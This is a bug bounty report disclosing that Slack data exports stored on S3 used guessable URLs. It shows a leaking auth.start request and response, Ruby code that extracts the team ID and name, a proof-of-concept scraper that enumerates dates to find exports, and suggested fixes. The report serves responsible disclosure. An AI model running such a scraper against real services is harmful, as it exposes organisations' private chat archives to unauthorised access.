The URLs used to download the exports can be guessed easily by an attacker. The location of the export file is based on a date, a team ID, and a team name:

```
http://s3-us-west-2.amazonaws.com/slack-files2/<team_id>/export/<date>/<name>%20Slack%20export%20<date>.zip
```

The only information an attacker needs is the team's name and ID (the date can be enumerated). This information can be obtained due to a minor information leak in the authentication API. The following steps can be used to reproduce the issue.

Step 1: obtain team ID and team name

The team ID and team name can be obtained by abusing a minor information leak in the `auth.start` API call. The following request and response give an example.

**Request**

```
POST /api/auth.start HTTP/1.1
...

email=jobert@hackerone.com
```

**Response**

```
HTTP/1.1 200 OK
...

{"ok":true,"email":"jobert@hackerone.com","domain":"hackerone.com","users":[{"url":"https:\/\/hackerone.slack.com\/","team":"HackerOne","user":"jobert","team_id":"T0254389F","user_id":"U0254GYNR"}],"teams":[],"create":"https:\/\/slack.com\/create?email=jobert%40hackerone.com"}
```

As can be seen, the JSON response contains the team ID (`T0254389F`) and the team name (`HackerOne`) we need for the download links.
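The leaked fields can be extracted from the `auth.start` response with a few lines of Ruby; this is a minimal sketch with the response body from the example above hard-coded for illustration:

```ruby
require 'json'

# Sample auth.start response body (abridged from the example above)
body = '{"ok":true,"email":"jobert@hackerone.com","domain":"hackerone.com",' \
       '"users":[{"url":"https://hackerone.slack.com/","team":"HackerOne",' \
       '"user":"jobert","team_id":"T0254389F","user_id":"U0254GYNR"}],"teams":[]}'

response = JSON.parse body
user = response['users'].first

# The two values needed to construct export URLs
team_id   = user['team_id']
team_name = user['team']

puts "team_id: #{team_id}, team: #{team_name}"
```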

Step 2: scrape S3

I wrote a rough PoC that scrapes S3 and shows the exports it finds (not something I'd use, just something I wrote for demonstration purposes -- feel free to use the team ID and name mentioned above to check it out).

``` ruby
require 'date'
require 'net/http'
require 'uri'

team_id = ARGV[0]
team_name = ARGV[1]

def create_export_url(team_id, team_name, date)
  date_dir = date.strftime '%Y-%m-%d'
  date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'

  "http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/"\
  "export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip"
end

date = Date.parse 'March 2nd, 2014'

365.times do
  uri = URI create_export_url(team_id, team_name, date)
  response = Net::HTTP.get_response uri

  if response.is_a? Net::HTTPOK
    puts "FOUND AN EXPORT: #{uri}"
  end

  date -= 1
end
```
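To make the filename encoding concrete, here is the URL such a scraper would probe for the example team on the report date (directory uses `YYYY-MM-DD`, filename uses a `%20`-encoded `Mon D YYYY` date):

```ruby
require 'date'

# Standalone rebuild of the URL construction used for Slack exports
def create_export_url(team_id, team_name, date)
  date_dir  = date.strftime '%Y-%m-%d'                    # e.g. 2014-03-02
  date_file = date.strftime('%b %-d %Y').gsub ' ', '%20'  # e.g. Mar%202%202014

  "http://s3-us-west-2.amazonaws.com/slack-files2/#{team_id}/" \
  "export/#{date_dir}/#{team_name}%20Slack%20export%20#{date_file}.zip"
end

url = create_export_url('T0254389F', 'HackerOne', Date.new(2014, 3, 2))
puts url
# http://s3-us-west-2.amazonaws.com/slack-files2/T0254389F/export/2014-03-02/HackerOne%20Slack%20export%20Mar%202%202014.zip
```

Every component of that URL is either public (team name), leaked by `auth.start` (team ID), or enumerable (date), which is what makes the scraping feasible.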

To avoid this kind of issue, you could generate a link that [expires within a certain amount](http://css-tricks.com/snippets/php/generate-expiring-amazon-s3-link/) of time (say, `<time-export-completed>+30m`), or use random values in the filename if expiring links are not an option (make sure you don't rely solely on public-domain information).
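As a sketch of the second mitigation, the export's object key could embed a long random token instead of values derivable from public information. The helper below is hypothetical (not Slack's actual scheme), just to show the idea:

```ruby
require 'securerandom'

# Hypothetical: name the export with a 128-bit random token so the URL
# cannot be reconstructed from the team ID, team name, and date alone.
def random_export_key(team_id)
  token = SecureRandom.hex(16) # 32 hex characters, unguessable
  "#{team_id}/export/#{token}.zip"
end

key = random_export_key('T0254389F')
puts key
```

The server would store this key alongside the export and hand it out only to authorized team admins, so possession of the link itself becomes the secret.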



Source: HackerOne report 2746, "Slack: Data exports stored on S3 can be scraped easily" (https://hackerone.com/reports/2746), reported by jobert, published 2014-03-02, resolved.